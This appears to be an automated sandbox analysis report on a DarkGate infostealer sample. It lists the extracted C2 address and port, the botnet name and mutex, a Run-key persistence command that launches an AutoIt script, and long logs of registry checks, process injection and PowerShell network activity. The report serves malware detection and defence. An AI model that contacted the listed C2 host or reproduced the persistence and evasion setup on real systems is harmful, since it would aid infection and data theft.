darkgate | hxxp://149[.]56[.]252[.]31/

Analysis

max time kernel
313s
max time network
314s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
04-03-2024 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://149.56.252.31/

Score

10^/10

darkgate pruebasvbs persistence stealer

Malware Config

Extracted

Family

darkgate

Botnet

pruebasvbs

149.56.252.31

Attributes

anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
8094
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
mwsMGaLY
minimum_disk
100
minimum_ram
4096
ping_interval
6
rootkit
false
startup_persistence
true
username
pruebasvbs

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 13 IoCs

resource	yara_rule
behavioral1/memory/1564-65-0x0000000006120000-0x000000000646F000-memory.dmp	family_darkgate_v6
behavioral1/memory/1288-74-0x0000000002A10000-0x00000000031B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1564-75-0x0000000006120000-0x000000000646F000-memory.dmp	family_darkgate_v6
behavioral1/memory/1288-79-0x0000000002A10000-0x00000000031B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2052-84-0x0000000003040000-0x00000000037E2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1288-85-0x0000000002A10000-0x00000000031B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1288-86-0x0000000002A10000-0x00000000031B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1288-87-0x0000000002A10000-0x00000000031B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2052-90-0x0000000003040000-0x00000000037E2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1288-100-0x0000000002A10000-0x00000000031B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2052-101-0x0000000003040000-0x00000000037E2000-memory.dmp	family_darkgate_v6
behavioral1/memory/4876-225-0x0000000005940000-0x0000000005C8F000-memory.dmp	family_darkgate_v6
behavioral1/memory/4876-226-0x0000000005940000-0x0000000005C8F000-memory.dmp	family_darkgate_v6

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 1564 created 2084	1564	AutoIt3.exe	38
PID 1288 created 2196	1288	GoogleUpdateCore.exe	75
PID 1288 created 2512	1288	GoogleUpdateCore.exe	42

Blocklisted process makes network request 8 IoCs

flow	pid	Process
44	2932	powershell.exe
45	2932	powershell.exe
46	2932	powershell.exe
47	2932	powershell.exe
436	1136	powershell.exe
438	1136	powershell.exe
444	1136	powershell.exe
448	1136	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	cscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4876	AutoIt3.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KcbcdAK = "C:\\ProgramData\\fhdhhkb\\Autoit3.exe C:\\ProgramData\\fhdhhkb\\dfbeabk.a3x"	GoogleUpdateCore.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GoogleUpdateCore.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GoogleUpdateCore.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133540375119824674"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000000000001000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000001b5d6776c668da0116ffd771d068da01ad5b3cd9436eda0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1584	chrome.exe
1584	chrome.exe
1564	AutoIt3.exe
1564	AutoIt3.exe
1564	AutoIt3.exe
1564	AutoIt3.exe
1288	GoogleUpdateCore.exe
1288	GoogleUpdateCore.exe
1288	GoogleUpdateCore.exe
1288	GoogleUpdateCore.exe
1288	GoogleUpdateCore.exe
1288	GoogleUpdateCore.exe
2052	GoogleUpdateCore.exe
2052	GoogleUpdateCore.exe
3104	PowerShell.exe
3104	PowerShell.exe
3104	PowerShell.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe
2872	chrome.exe
2872	chrome.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
4876	AutoIt3.exe
4876	AutoIt3.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1288	GoogleUpdateCore.exe
2052	GoogleUpdateCore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeRestorePrivilege	1352	7zFM.exe
Token: 35	1352	7zFM.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe
Token: SeShutdownPrivilege	1584	chrome.exe
Token: SeCreatePagefilePrivilege	1584	chrome.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1352	7zFM.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe
1584	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
692	chrome.exe
1556	chrome.exe
3480	chrome.exe
4888	chrome.exe
2036	chrome.exe
2036	chrome.exe
2036	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1584 wrote to memory of 2884	1584	chrome.exe	88
PID 1584 wrote to memory of 2884	1584	chrome.exe	88
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
PID 1584 wrote to memory of 3516	1584	chrome.exe	91
